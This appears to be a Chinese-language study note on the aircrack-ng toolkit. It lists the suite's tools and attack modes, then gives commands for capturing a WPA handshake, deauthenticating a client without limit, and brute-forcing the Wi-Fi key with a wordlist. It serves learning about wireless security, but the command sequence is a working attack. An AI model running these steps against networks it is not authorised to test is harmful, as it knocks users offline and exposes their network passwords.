1. 程式人生 > >aircrack-ng 工具集學習

aircrack-ng 工具集學習

一、aircrack-ng簡介

aircrack-ng是Aircrack專案的一個分支。是一個與802.11標準的無線網路分析有關的安全軟體,主要功能有:網路偵測,資料包嗅探,
WEP和WPA/WPA2-PSK破解。Aircrack-ng可以工作在任何支援監聽模式的無線網絡卡上(裝置列表請參閱其官方網站)並嗅探802.11a,802.11b,
802.11g的資料。該程式可執行在Linux和Windows上。

aircrack-ng 套件包含有:
Name Description
aircrack-ng 破解 WEP以及 WPA字典攻擊)金鑰
airdecap-ng 通過已知金鑰來解密 WEP或WPA 嗅探資料
airmon-ng 將網絡卡設定為監聽模式
aireplay-ng 資料包注入工具(Linux和Windows使用
CommView
驅動程式)
airodump-ng 資料包嗅探:將無線網路資料輸送到PCAP或IVS檔案並顯示網路資訊
airtun-ng 建立虛擬管道
airolib-ng 儲存、管理 ESSID密碼列表
packetforge-ng 建立資料包注入用的加密包。
Tools 混合、轉換工具
airbase-ng 軟體模擬AP
airdecloak-ng 消除pcap檔案中的 WEP加密
airdriver-ng 無線裝置驅動管理工具
airolib-ng 儲存、管理 ESSID密碼列表,計算對應的金鑰
airserv-ng 允許不同的程序訪問無線網絡卡
buddy-ng easside-ng的檔案描述
easside-ng AP接入點通訊(無 WEP
tkiptun-ng WPA/ TKIP攻擊
wesside-ng 自動破解WEP金鑰

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

二、aircrack-ng各個元件介紹

1. aireplay-ng: 是aircrack-ng套件裡的一款抓包工具,aireplay-ng 中集成了10種攻擊方式,分別是:
  Attack 0: Deauthentication 解除認證
  Attack 1: Fake authentication 偽造身份驗證
  Attack 2: Interactive packet replay 互動式資料包重播
  Attack 3: ARP request replay attack ARP請求重播攻擊
  Attack 4: KoreK chopchop attack KoreK 斬殺攻擊
  Attack 5: Fragmentation attack 碎片攻擊
  Attack 6: Cafe-latte attack 咖啡拿鐵攻擊
  Attack 7: Client-oriented fragmentation attack 面向客戶的分片攻擊
  Attack 8: WPA Migration Mode WPA 遷移模式
  Attack 9: Injection test 注射試驗

2. airmon-ng: 使用airmon-ng檢視你無線網絡卡。
# sudo airmon-ng 檢視網絡卡資訊
# airmon-ng start wlan0 將網絡卡設定為監聽模式(混雜模式)
# airmon-ng stop wlan0 將網絡卡從監聽模式(混雜模式)中退出

3. airodump-ng:使用airodump-ng掃描訊號
# sudo airodump-ng wlan0mon airodump-ng <你的monitor模式的網絡卡>
列印的資訊中:
  BSSID是AP端的MAC地址
  PWR是訊號強度,數字越小越好
  #Data是對應的路由器的線上資料吞吐量,數字越大,資料上傳量越大。
  CH是對應路由器的所在頻道
  ESSID是對應路由器的名稱

# sudo airodump-ng -c 6 -w Desktop/handshake --bssid C0:00:00:00:00:48 wlan0mon 使用airodump-ng監聽指定目標頻道。
注:airodump-ng -c <AP的頻道> -w <抓取握手包的存放位置> --bssid <AP的MAC地址> <你的處於monitor模式的網絡卡名稱>
在你的抓取握手包的存放目錄會生成4個檔案:
  handshake-01.cap 握手包檔案的拓展名為
  handshake-01.csv
  handshake-01.kismet.csv
  handshake-01.kismet.netxml

4. aireplay-ng: 使用aireplay-ng進行解除認證攻擊模式.

一個合法的客戶端要連上AP要經歷四次握手,四次握手的全過程如下:
1.你請求連AP
2.AP發一個數據包給你
3.你將收到的資料包用wpa金鑰加密,然後發給AP
4.AP用自己儲存的wpa金鑰加密相同資料包,然後和你發給他的比較,如果相同,就發准許接入的許可。
我們所說的抓握手包,是指抓AP發給合法客戶的資料包,和合法客戶端加密後發給AP的資料包。所以我們就抓這兩個包,當我們有了明文和密文,就可以破解出金鑰。

保持上一個terminal視窗的執行狀態,開啟一個新的terminal,然後:
# sudo aireplay-ng -0 0 -a C0:00:00:00:00:48 -c 18:00:00:00:00:88 wlan0mon
注:aireplay-ng -<攻擊模式,我們這裡使用解除認證攻擊(0)> [攻擊次數,0為無限攻擊] -a <AP端的MAC地址> -c <客戶端端的MAC地址> <你的處於monitor模式的網絡卡>

這裡使用的是解除認證攻擊模式,給客戶端無限傳送測試包使其下線。當你獲取到握手包時,可以使用快捷重點內容鍵Ctrl + C 停止傳送測試包。

5. aircrack-ng: 使用字典進行破解
# sudo airmon-ng stop wlan0mon 關閉監聽模式。
# sudo aircrack-ng -w Desktop/wordlist.txt Desktop/handshake-01.cap 使用字典進行暴力破解。
注:aircrack-ng -w <字典路徑名> <握手包路徑名>
破解速度取決你CPU的核心數和速率。當密碼破解成功時,會顯示”KEY FOUND!”字樣,中括號為AP端的密碼。

 


參考:
https://blog.csdn.net/tonyzhejiang/article/details/72152512
http://www.aircrack-ng.org/#    aircrack-ng工具包下載路徑
http://www.voidcn.com/blog/king_of_fighter/article/p-2018690.html